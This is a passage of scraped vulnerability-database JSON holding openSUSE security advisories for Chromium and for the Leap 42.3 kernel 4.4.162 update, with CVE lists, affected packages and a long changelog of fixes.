CVE-2018-17475: URL spoof in Omnibox\n - CVE-2018-17476: Security UI occlusion in full screen mode\n - CVE-2018-5179: Lack of limits on update() in ServiceWorker\n - CVE-2018-17477: UI spoof in Extensions\n\n This update contains the following packaging changes:\n\n - VAAPI hardware accelerated rendering is now enabled by default.\n - Use the system libusb-1.0 library\n - Use bundled harfbuzz library\n - Disable gnome-keyring to avoid crashes\n - noto-emoji-fonts is no longer a recommended dependency\n\n", "edition": 1, "reporter": "Suse", "published": "2018-11-21T00:11:39", "title": "Security update for chromium (important)", "type": "suse", "enchantments": {"score": {"modified": "2018-11-21T03:16:50", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17472", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-17478", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2018-11-21T00:11:39", "id": "OPENSUSE-SU-2018:3835-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-11/msg00035.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-11-21T01:33:01", "references": ["https://bugzilla.suse.com/1012422", "https://bugzilla.suse.com/1011920", "https://bugzilla.suse.com/1112263", "https://bugzilla.suse.com/1113769", "https://bugzilla.suse.com/1112007", "https://bugzilla.suse.com/1078788", "https://bugzilla.suse.com/1112902", "https://bugzilla.suse.com/1098050", "https://bugzilla.suse.com/1093118", "https://bugzilla.suse.com/1057199", "https://bugzilla.suse.com/1054239", "https://bugzilla.suse.com/1110006", "https://bugzilla.suse.com/1079524", "https://bugzilla.suse.com/1107870", "https://bugzilla.suse.com/1098996", "https://bugzilla.suse.com/1053043", "https://bugzilla.suse.com/1107060", "https://bugzilla.suse.com/1109784", "https://bugzilla.suse.com/1106913", "https://bugzilla.suse.com/1114648", "https://bugzilla.suse.com/1108377", "https://bugzilla.suse.com/1020645", "https://bugzilla.suse.com/1101555", "https://bugzilla.suse.com/1050431", "https://bugzilla.suse.com/1109919", "https://bugzilla.suse.com/1012382", "https://bugzilla.suse.com/1111870", "https://bugzilla.suse.com/1109907", "https://bugzilla.suse.com/1112903", "https://bugzilla.suse.com/1109772", "https://bugzilla.suse.com/1065726", "https://bugzilla.suse.com/1073579", "https://bugzilla.suse.com/1109923", "https://bugzilla.suse.com/1065600", "https://bugzilla.suse.com/1106110", "https://bugzilla.suse.com/1042422", "https://bugzilla.suse.com/1112262", "https://bugzilla.suse.com/1113667", "https://bugzilla.suse.com/1083527", "https://bugzilla.suse.com/1035053", "https://bugzilla.suse.com/1048129", "https://bugzilla.suse.com/1062303", "https://bugzilla.suse.com/1111516", "https://bugzilla.suse.com/981083", "https://bugzilla.suse.com/1105025", "https://bugzilla.suse.com/1112905", "https://bugzilla.suse.com/1106929", "https://bugzilla.suse.com/1094825", "https://bugzilla.suse.com/1109818", "https://bugzilla.suse.com/1083215", "https://bugzilla.suse.com/1114229", "https://bugzilla.suse.com/1091158", "https://bugzilla.suse.com/1105931", "https://bugzilla.suse.com/1104124", "https://bugzilla.suse.com/1115587", "https://bugzilla.suse.com/1031392", "https://bugzilla.suse.com/1113751", "https://bugzilla.suse.com/1106359", "https://bugzilla.suse.com/1112894", "https://bugzilla.suse.com/1106594", "https://bugzilla.suse.com/1095805", "https://bugzilla.suse.com/1043591", "https://bugzilla.suse.com/1114178", "https://bugzilla.suse.com/1108498", "https://bugzilla.suse.com/1107535", "https://bugzilla.suse.com/1076393", "https://bugzilla.suse.com/1109158", "https://bugzilla.suse.com/1107299", "https://bugzilla.suse.com/997172", "https://bugzilla.suse.com/1084760", "https://bugzilla.suse.com/1067906"], "affectedPackage": [{"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-syms-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-syms", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-debug-debuginfo-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-debug-debugsource-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-debug-debugsource", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-obs-build-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-obs-build", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-debugsource-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-vanilla-debugsource", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-obs-qa-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-obs-qa", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-debug-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "noarch", "packageFilename": "kernel-devel-4.4.162-78.1.noarch.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "noarch", "packageFilename": "kernel-docs-pdf-4.4.162-78.1.noarch.rpm", "packageName": "kernel-docs-pdf", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "noarch", "packageFilename": "kernel-macros-4.4.162-78.1.noarch.rpm", "packageName": "kernel-macros", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-default-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-default", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-default-debuginfo-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-default-base-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-default-base", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-debug-base-debuginfo-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-debug-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "noarch", "packageFilename": "kernel-docs-4.4.162-78.1.noarch.rpm", "packageName": "kernel-docs", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-obs-build-debugsource-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-obs-build-debugsource", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-default-debugsource-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-default-debugsource", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-debug-base-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-debug-base", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-base-debuginfo-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-vanilla-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-debug-devel-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "noarch", "packageFilename": "kernel-source-4.4.162-78.1.noarch.rpm", "packageName": "kernel-source", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "noarch", "packageFilename": "kernel-source-vanilla-4.4.162-78.1.noarch.rpm", "packageName": "kernel-source-vanilla", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-base-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-vanilla-base", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-vanilla", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-debug-devel-debuginfo-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-debug-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-devel-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-vanilla-devel", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-default-base-debuginfo-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-default-base-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-default-devel-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-default-devel", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "x86_64", "packageFilename": "kernel-vanilla-debuginfo-4.4.162-78.1.x86_64.rpm", "packageName": "kernel-vanilla-debuginfo", "operator": "lt"}, {"OS": "openSUSE Leap", "OSVersion": "42.3", "packageVersion": "4.4.162-78.1", "arch": "noarch", "packageFilename": "kernel-docs-html-4.4.162-78.1.noarch.rpm", "packageName": "kernel-docs-html", "operator": "lt"}], "description": "The openSUSE Leap 42.3 kernel was updated to 4.4.162 to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2018-18281: The mremap() syscall performs TLB flushes after dropping\n pagetable locks. If a syscall such as ftruncate() removes entries from\n the pagetables of a task that is in the middle of mremap(), a stale TLB\n entry can remain for a short time that permits access to a physical page\n after it has been released back to the page allocator and reused.\n (bnc#1113769).\n - CVE-2018-18710: An information leak in cdrom_ioctl_select_disc in\n drivers/cdrom/cdrom.c could be used by local attackers to read kernel\n memory because a cast from unsigned long to int interferes with bounds\n checking. This is similar to CVE-2018-10940 and CVE-2018-16658\n (bnc#1113751).\n - CVE-2018-18690: A local attacker able to set attributes on an xfs\n filesystem could make this filesystem non-operational until the next\n mount by triggering an unchecked error condition during an xfs attribute\n change, because xfs_attr_shortform_addname in fs/xfs/libxfs/xfs_attr.c\n mishandled ATTR_REPLACE operations with conversion of an attr from short\n to long form (bnc#1105025).\n - CVE-2018-18386: drivers/tty/n_tty.c allowed local attackers (who are\n able to access pseudo terminals) to hang/block further usage of any\n pseudo terminal devices due to an EXTPROC versus ICANON confusion in\n TIOCINQ (bnc#1094825).\n - CVE-2018-9516: A lack of certain checks in the hid_debug_events_read()\n function in the drivers/hid/hid-debug.c file might have resulted in\n receiving userspace buffer overflow and an out-of-bounds write or to the\n infinite loop. (bnc#1108498).\n\n The following non-security bugs were fixed:\n\n - 6lowpan: iphc: reset mac_header after decompress to fix panic\n (bnc#1012382).\n - Add azure kernel description.\n - Add bug reference to\n patches.suse/x86-entry-64-use-a-per-cpu-trampoline-stack-fix1.patch\n - Add graphviz to buildreq for image conversion\n - Add reference to bsc#1104124 to\n patches.fixes/fs-aio-fix-the-increment-of-aio-nr-and-counting-agai.patch\n - ALSA: hda: Add AZX_DCAPS_PM_RUNTIME for AMD Raven Ridge (bnc#1012382).\n - ALSA: hda/realtek - Cannot adjust speaker's volume on Dell XPS 27 7760\n (bnc#1012382).\n - apparmor: remove no-op permission check in policy_unpack (git-fixes).\n - ARC: build: Get rid of toolchain check (bnc#1012382).\n - ARC: clone syscall to setp r25 as thread pointer (bnc#1012382).\n - arch/hexagon: fix kernel/dma.c build warning (bnc#1012382).\n - arch-symbols: use bash as interpreter since the script uses bashism.\n - arm64: cpufeature: Track 32bit EL0 support (bnc#1012382).\n - arm64: jump_label.h: use asm_volatile_goto macro instead of "asm goto"\n (bnc#1012382).\n - arm64: KVM: Sanitize PSTATE.M when being set from userspace\n (bnc#1012382).\n - arm64: KVM: Tighten guest core register access from userspace\n (bnc#1012382).\n - ARM: dts: at91: add new compatibility string for macb on sama5d3\n (bnc#1012382).\n - ARM: dts: dra7: fix DCAN node addresses (bnc#1012382).\n - ARM: mvebu: declare asm symbols as character arrays in pmsu.c\n (bnc#1012382).\n - ASoC: dapm: Fix potential DAI widget pointer deref when linking DAIs\n (bnc#1012382).\n - ASoC: sigmadsp: safeload should not have lower byte limit (bnc#1012382).\n - ASoC: wm8804: Add ACPI support (bnc#1012382).\n - ath10k: fix scan crash due to incorrect length calculation (bnc#1012382).\n - ath10k: fix use-after-free in ath10k_wmi_cmd_send_nowait (bnc#1012382).\n - ath10k: protect ath10k_htt_rx_ring_free with rx_ring.lock (bnc#1012382).\n - Bluetooth: Add a new Realtek 8723DE ID 0bda:b009 (bnc#1012382).\n - bnxt_en: Fix TX timeout during netpoll (bnc#1012382).\n - bonding: avoid possible dead-lock (bnc#1012382).\n - bpf: fix cb access in socket filter programs on tail calls (bsc#1012382).\n - bpf: fix map not being uncharged during map creation failure\n (bsc#1012382).\n - bpf, s390: fix potential memleak when later bpf_jit_prog fails\n (git-fixes).\n - bpf, s390x: do not reload skb pointers in non-skb context (git-fixes).\n - bsc#1106913: Replace with upstream variants Delete\n patches.suse/11-x86-mm-only-set-ibpb-when-the-new-thread-cannot-ptrace-curr\n ent-thread.patch.\n - bs-upload-kernel: do not set %opensuse_bs Since SLE15 it is not set in\n the distribution project so do not set it for kernel projects either.\n - btrfs: add a comp_refs() helper (dependency for bsc#1031392).\n - btrfs: add missing initialization in btrfs_check_shared (Git-fixes\n bsc#1112262).\n - btrfs: add tracepoints for outstanding extents mods (dependency for\n bsc#1031392).\n - btrfs: add wrapper for counting BTRFS_MAX_EXTENT_SIZE (dependency for\n bsc#1031392).\n - btrfs: cleanup extent locking sequence (dependency for bsc#1031392).\n - btrfs: defrag: use btrfs_mod_outstanding_extents in\n cluster_pages_for_defrag (Follow up fixes for bsc#1031392).\n - btrfs: delayed-inode: Remove wrong qgroup meta reservation calls\n (bsc#1031392).\n - btrfs: delayed-inode: Use new qgroup meta rsv for delayed inode and item\n (bsc#1031392).\n - btrfs: Enhance btrfs_trim_fs function to handle error better (Dependency\n for bsc#1113667).\n - btrfs: Ensure btrfs_trim_fs can trim the whole filesystem (bsc#1113667).\n - btrfs: fix error handling in btrfs_dev_replace_start (bsc#1107535).\n - Btrfs: fix invalid attempt to free reserved space on failure to cow\n range (dependency for bsc#1031392).\n - btrfs: fix missing error return in btrfs_drop_snapshot (Git-fixes\n bsc#1109919).\n - btrfs: Fix race condition between delayed refs and blockgroup removal\n (Git-fixes bsc#1112263).\n - btrfs: Fix wrong btrfs_delalloc_release_extents parameter (bsc#1031392).\n - Btrfs: kill trans in run_delalloc_nocow and btrfs_cross_ref_exist\n (dependency for bsc#1031392).\n - btrfs: make the delalloc block rsv per inode (dependency for\n bsc#1031392).\n - Btrfs: pass delayed_refs directly to btrfs_find_delayed_ref_head\n (dependency for bsc#1031392).\n - btrfs: qgroup: Add quick exit for non-fs extents (dependency for\n bsc#1031392).\n - btrfs: qgroup: Cleanup btrfs_qgroup_prepare_account_extents function\n (dependency for bsc#1031392).\n - btrfs: qgroup: Cleanup the remaining old reservation counters\n (bsc#1031392).\n - btrfs: qgroup: Commit transaction in advance to reduce early EDQUOT\n (bsc#1031392).\n - btrfs: qgroup: Do not use root->qgroup_meta_rsv for qgroup (bsc#1031392).\n - btrfs: qgroup: Fix wrong qgroup reservation update for relationship\n modification (bsc#1031392).\n - btrfs: qgroup: Introduce function to convert META_PREALLOC into\n META_PERTRANS (bsc#1031392).\n - btrfs: qgroup: Introduce helpers to update and access new qgroup rsv\n (bsc#1031392).\n - btrfs: qgroup: Make qgroup_reserve and its callers to use separate\n reservation type (bsc#1031392).\n - btrfs: qgroup: Skeleton to support separate qgroup reservation type\n (bsc#1031392).\n - btrfs: qgroups: opencode qgroup_free helper (dependency for bsc#1031392).\n - btrfs: qgroup: Split meta rsv type into meta_prealloc and meta_pertrans\n (bsc#1031392).\n - btrfs: qgroup: Update trace events for metadata reservation\n (bsc#1031392).\n - btrfs: qgroup: Update trace events to use new separate rsv types\n (bsc#1031392).\n - btrfs: qgroup: Use independent and accurate per inode qgroup rsv\n (bsc#1031392).\n - btrfs: qgroup: Use root::qgroup_meta_rsv_* to record qgroup meta\n reserved space (bsc#1031392).\n - btrfs: qgroup: Use separate meta reservation type for delalloc\n (bsc#1031392).\n - btrfs: remove type argument from comp_tree_refs (dependency for\n bsc#1031392).\n - Btrfs: rework outstanding_extents (dependency for bsc#1031392).\n - btrfs: switch args for comp_*_refs (dependency for bsc#1031392).\n - btrfs: Take trans lock before access running trans in check_delayed_ref\n (Follow up fixes for bsc#1031392).\n - ceph: avoid a use-after-free in ceph_destroy_options() (bsc#1112007).\n - cfg80211: fix a type issue in ieee80211_chandef_to_operating_class()\n (bnc#1012382).\n - cfg80211: nl80211_update_ft_ies() to validate NL80211_ATTR_IE\n (bnc#1012382).\n - cgroup: Fix deadlock in cpu hotplug path (bnc#1012382).\n - cgroup, netclassid: add a preemption point to write_classid\n (bnc#1098996).\n - CIFS: check for STATUS_USER_SESSION_DELETED (bsc#1112902).\n - cifs: connect to servername instead of IP for IPC$ share (bsc#1106359).\n - cifs: fix memory leak in SMB2_open() (bsc#1112894).\n - cifs: Fix use after free of a mid_q_entry (bsc#1112903).\n - cifs: read overflow in is_valid_oplock_break() (bnc#1012382).\n - clocksource/drivers/ti-32k: Add CLOCK_SOURCE_SUSPEND_NONSTOP flag for\n non-am43 SoCs (bnc#1012382).\n - config.sh: set BUGZILLA_PRODUCT for SLE12-SP3\n - crypto: mxs-dcp - Fix wait logic on chan threads (bnc#1012382).\n - crypto: skcipher - Fix -Wstringop-truncation warnings (bnc#1012382).\n - Define dependencies of in-kernel KMPs statically This allows us to use\n rpm's internal dependency generator (bsc#981083).\n - dm cache: fix resize crash if user does not reload cache table\n (bnc#1012382).\n - dm thin metadata: fix __udivdi3 undefined on 32-bit (bnc#1012382).\n - dm thin metadata: try to avoid ever aborting transactions (bnc#1012382).\n - Do not ship firmware (bsc#1054239). Pull firmware from kernel-firmware\n instead.\n - drivers/tty: add error handling for pcmcia_loop_config (bnc#1012382).\n - drm/amdgpu: Fix SDMA HQD destroy error on gfx_v7 (bnc#1012382).\n - drm/nouveau/TBDdevinit: do not fail when PMU/PRE_OS is missing from\n VBIOS (bnc#1012382).\n - drm/virtio: fix bounds check in virtio_gpu_cmd_get_capset() (bsc#1106929)\n - Drop dtb-source.spec and move the sources to kernel-source (bsc#1011920)\n - Drop multiversion(kernel) from the KMP template ()\n - e1000: check on netif_running() before calling e1000_up() (bnc#1012382).\n - e1000: ensure to free old tx/rx rings in set_ringparam() (bnc#1012382).\n - ebtables: arpreply: Add the standard target sanity check (bnc#1012382).\n - EDAC, thunderx: Fix memory leak in thunderx_l2c_threaded_isr()\n (bsc#1114648).\n - Enable kernel-obs-{build,qa} also in the vanilla branches\n - ethtool: restore erroneously removed break in dev_ethtool (bsc#1114229).\n - fbdev: fix broken menu dependencies (bsc#1106929)\n - fbdev/omapfb: fix omapfb_memory_read infoleak (bnc#1012382).\n - Fix file list to remove REPORTING-BUGS\n - Fix html and pdf creation in Documetation/media/*\n - floppy: Do not copy a kernel pointer to user memory in FDGETPRM ioctl\n (bnc#1012382).\n - fs/cifs: do not translate SFM_SLASH (U+F026) to backslash (bnc#1012382).\n - fs/cifs: suppress a string overflow warning (bnc#1012382).\n - gpio: adp5588: Fix sleep-in-atomic-context bug (bnc#1012382).\n - hexagon: modify ffs() and fls() to return int (bnc#1012382).\n - HID: hid-ntrig: add error handling for sysfs_create_group (bnc#1012382).\n - housekeeping: btrfs selftests: fold backport fix into backport patch\n - housekeeping: move btrfs patches to sorted section. No code changes.\n - hv: avoid crash in vmbus sysfs files (bnc#1108377).\n - hwmon: (adt7475) Make adt7475_read_word() return errors (bnc#1012382).\n - hwmon: (ina2xx) fix sysfs shunt resistor read access (bnc#1012382).\n - hwrng: core - document the quality field (git-fixes).\n - i2c: i2c-scmi: fix for i2c_smbus_write_block_data (bnc#1012382).\n - i2c: i801: Allow ACPI AML access I/O ports not reserved for SMBus\n (bnc#1012382).\n - i2c: uniphier-f: issue STOP only for last message or I2C_M_STOP\n (bnc#1012382).\n - i2c: uniphier: issue STOP only for last message or I2C_M_STOP\n (bnc#1012382).\n - IB/srp: Avoid that sg_reset -d ${srp_device} triggers an infinite loop\n (bnc#1012382).\n - Input: atakbd - fix Atari CapsLock behaviour (bnc#1012382).\n - Input: atakbd - fix Atari keymap (bnc#1012382).\n - Input: elantech - enable middle button of touchpad on ThinkPad P72\n (bnc#1012382).\n - ip6_tunnel: be careful when accessing the inner header (bnc#1012382).\n - ip_tunnel: be careful when accessing the inner header (bnc#1012382).\n - ipv4: fix use-after-free in ip_cmsg_recv_dstaddr() (bnc#1012382).\n - ixgbe: pci_set_drvdata must be called before register_netdev (Git-fixes\n bsc#1109923).\n - jffs2: return -ERANGE when xattr buffer is too small (bnc#1012382).\n - KVM: PPC: Book3S HV: Do not truncate HPTE index in xlate function\n (bnc#1012382).\n - KVM: x86: remove eager_fpu field of struct kvm_vcpu_arch (bnc#1012382).\n - lib/test_hexdump.c: fix failure on big endian cpu (bsc#1106110).\n - mac80211: correct use of IEEE80211_VHT_CAP_RXSTBC_X (bnc#1012382).\n - mac80211: fix a race between restart and CSA flows (bnc#1012382).\n - mac80211: fix setting IEEE80211_KEY_FLAG_RX_MGMT for AP mode keys\n (bnc#1012382).\n - mac80211: Fix station bandwidth setting after channel switch\n (bnc#1012382).\n - mac80211_hwsim: correct use of IEEE80211_VHT_CAP_RXSTBC_X (bnc#1012382).\n - mac80211: mesh: fix HWMP sequence numbering to follow standard\n (bnc#1012382).\n - mac80211: shorten the IBSS debug messages (bnc#1012382).\n - mach64: detect the dot clock divider correctly on sparc (bnc#1012382).\n - md-cluster: clear another node's suspend_area after the copy is finished\n (bnc#1012382).\n - media: af9035: prevent buffer overflow on write (bnc#1012382).\n - media: exynos4-is: Prevent NULL pointer dereference in\n __isp_video_try_fmt() (bnc#1012382).\n - media: fsl-viu: fix error handling in viu_of_probe() (bnc#1012382).\n - media: omap3isp: zero-initialize the isp cam_xclk{a,b} initial data\n (bnc#1012382).\n - media: omap_vout: Fix a possible null pointer dereference in\n omap_vout_open() (bsc#1050431).\n - media: s3c-camif: ignore -ENOIOCTLCMD from v4l2_subdev_call for s_power\n (bnc#1012382).\n - media: soc_camera: ov772x: correct setting of banding filter\n (bnc#1012382).\n - media: tm6000: add error handling for dvb_register_adapter (bnc#1012382).\n - media: uvcvideo: Support realtek's UVC 1.5 device (bnc#1012382).\n - media: v4l: event: Prevent freeing event subscriptions while accessed\n (bnc#1012382).\n - media: videobuf-dma-sg: Fix dma_{sync,unmap}_sg() calls (bsc#1050431).\n - memory_hotplug: cond_resched in __remove_pages (bnc#1114178).\n - mfd: omap-usb-host: Fix dts probe of children (bnc#1012382).\n - mm: madvise(MADV_DODUMP): allow hugetlbfs pages (bnc#1012382).\n - mm: /proc/pid/pagemap: hide swap entries from unprivileged users\n (Git-fixes bsc#1109907).\n - mm/vmstat.c: fix outdated vmstat_text (bnc#1012382).\n - mm/vmstat.c: skip NR_TLB_REMOTE_FLUSH* properly (bnc#1012382).\n - mm/vmstat.c: skip NR_TLB_REMOTE_FLUSH* properly (git fixes).\n - module: exclude SHN_UNDEF symbols from kallsyms api (bnc#1012382).\n - move changes without Git-commit out of sorted section\n - net: cadence: Fix a sleep-in-atomic-context bug in macb_halt_tx()\n (bnc#1012382).\n - net: hns: fix length and page_offset overflow when\n CONFIG_ARM64_64K_PAGES (bnc#1012382).\n - net: ipv4: update fnhe_pmtu when first hop's MTU changes (bnc#1012382).\n - net/ipv6: Display all addresses in output of /proc/net/if_inet6\n (bnc#1012382).\n - netlabel: check for IPV4MASK in addrinfo_get (bnc#1012382).\n - net: macb: disable scatter-gather for macb on sama5d3 (bnc#1012382).\n - net/mlx4: Use cpumask_available for eq->affinity_mask (bnc#1012382).\n - net: mvpp2: Extract the correct ethtype from the skb for tx csum offload\n (bnc#1012382).\n - net: systemport: Fix wake-up interrupt race during resume (bnc#1012382).\n - net/usb: cancel pending work when unbinding smsc75xx (bnc#1012382).\n - NFS: add nostatflush mount option (bsc#1065726).\n - NFS: Avoid quadratic search when freeing delegations (bsc#1084760).\n - nfsd: fix corrupted reply to badly ordered compound (bnc#1012382).\n - ocfs2: fix locking for res->tracking and dlm->tracking_list\n (bnc#1012382).\n - of: unittest: Disable interrupt node tests for old world MAC systems\n (bnc#1012382).\n - ovl: Copy inode attributes after setting xattr (bsc#1107299).\n - Pass x86 as architecture on x86_64 and i386 (bsc#1093118).\n - PCI: hv: Use effective affinity mask (bsc#1109772).\n - PCI: Reprogram bridge prefetch registers on resume (bnc#1012382).\n - perf probe powerpc: Ignore SyS symbols irrespective of endianness\n (bnc#1012382).\n - perf script python: Fix export-to-postgresql.py occasional failure\n (bnc#1012382).\n - PM / core: Clear the direct_complete flag on errors (bnc#1012382).\n - powerpc/kdump: Handle crashkernel memory reservation failure\n (bnc#1012382).\n - powerpc/numa: Skip onlining a offline node in kdump path (bsc#1109784).\n - powerpc/perf/hv-24x7: Fix passing of catalog version number\n (bsc#1053043).\n - powerpc/pseries: Fix build break for SPLPAR=n and CPU hotplug\n (bsc#1079524, git-fixes).\n - powerpc/pseries: Fix CONFIG_NUMA=n build (bsc#1067906, git-fixes).\n - powerpc/pseries/mm: call H_BLOCK_REMOVE (bsc#1109158).\n - powerpc/pseries/mm: factorize PTE slot computation (bsc#1109158).\n - powerpc/pseries/mm: Introducing FW_FEATURE_BLOCK_REMOVE (bsc#1109158).\n - powerpc/rtas: Fix a potential race between CPU-Offline & Migration\n (bsc#1111870).\n - power: vexpress: fix corruption in notifier registration (bnc#1012382).\n - proc: restrict kernel stack dumps to root (bnc#1012382).\n - qlcnic: fix Tx descriptor corruption on 82xx devices (bnc#1012382).\n - r8169: Clear RTL_FLAG_TASK_*_PENDING when clearing RTL_FLAG_TASK_ENABLED\n (bnc#1012382).\n - RAID10 BUG_ON in raise_barrier when force is true and conf->barrier is 0\n (bnc#1012382).\n - rculist: add list_for_each_entry_from_rcu() (bsc#1084760).\n - rculist: Improve documentation for list_for_each_entry_from_rcu()\n (bsc#1084760).\n - RDMA/ucma: check fd type in ucma_migrate_id() (bnc#1012382).\n - README: Clean-up trailing whitespace\n - reiserfs: add check to detect corrupted directory entry (bsc#1109818).\n - reiserfs: do not panic on bad directory entries (bsc#1109818).\n - resource: Include resource end in walk_*() interfaces (bsc#1114648).\n - Revert "btrfs: qgroups: Retry after commit on getting EDQUOT"\n (bsc#1031392).\n - Revert "drm: Do not pass negative delta to ktime_sub_ns()" (bsc#1106929)\n - Revert "drm/i915: Initialize HWS page address after GPU reset"\n (bsc#1106929)\n - Revert "KVM: x86: remove eager_fpu field of struct kvm_vcpu_arch" (kabi).\n - Revert "media: v4l: event: Prevent freeing event subscriptions while\n accessed" (kabi).\n - Revert "proc: restrict kernel stack dumps to root" (kabi).\n - Revert "rpm/constraints.in: Lower default disk space requirement from\n 25G to 24G" This reverts commit\n 406abda1467c038842febffe264faae1fa2e3c1d. ok, did not wait long enough\n to see the failure.\n - Revert "Skip intel_crt_init for Dell XPS 8700" (bsc#1106929)\n - Revert "tcp: add tcp_ooo_try_coalesce() helper" (kabi).\n - Revert "tcp: call tcp_drop() from tcp_data_queue_ofo()" (kabi).\n - Revert "tcp: fix a stale ooo_last_skb after a replace" (kabi).\n - Revert "tcp: free batches of packets in tcp_prune_ofo_queue()" (kabi).\n - Revert "tcp: use an RB tree for ooo receive queue" (kabi).\n - Revert "usb: cdc-wdm: Fix a sleep-in-atomic-context bug in\n service_outstanding_interrupt()" (bnc#1012382).\n - Revert "x86/fpu: Finish excising 'eagerfpu'" (kabi).\n - Revert "x86/fpu: Remove struct fpu::counter" (kabi).\n - Revert "x86/fpu: Remove use_eager_fpu()" (kabi).\n - rndis_wlan: potential buffer overflow in rndis_wlan_auth_indication()\n (bnc#1012382).\n - rpm/apply-patches: Fix failure if there are no vanilla patches The grep\n command returns 1 if there are no patches and we are using pipefail.\n - 